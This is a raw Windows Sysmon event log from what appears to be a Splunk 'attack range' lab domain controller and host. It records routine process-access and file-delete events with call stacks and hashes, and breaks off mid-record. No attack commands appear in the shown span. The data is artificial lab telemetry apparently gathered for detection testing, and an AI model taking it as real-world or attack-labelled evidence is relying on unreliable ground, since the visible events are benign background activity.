10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:59.308{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:00.815{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AA1D8CF1F580366E2F3882C23D1D8C0,SHA256=6776D2D7011FA9E64DC8E9CF9C07D1ECCD72AE411683CAB5888CDDE8B2941F60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:00.855{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=44D74042FFC6FFEFC074A32E56207872,SHA256=BDFB82C02C2F48E307BD66F5CE03D36AFC4CC01E28D2BDE4E43B949ABC47FA8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:00.040{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50403031D6B10C308FE77D4D43425DFF,SHA256=52197299470DDC409C1653967355310EC4B75685F2BD8E4D3626843D8EBEA47A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:01.816{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE27C928E4905B5F94F5D8E94D5ECB1F,SHA256=7402A376D0A97A52B703E049446D98FFB2D8715AD30E05BD0C251AB22F4DE880,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.895{C8EA50B7-120D-6216-2B05-000000003802}653692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.408{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-120D-6216-2B05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.392{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.392{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 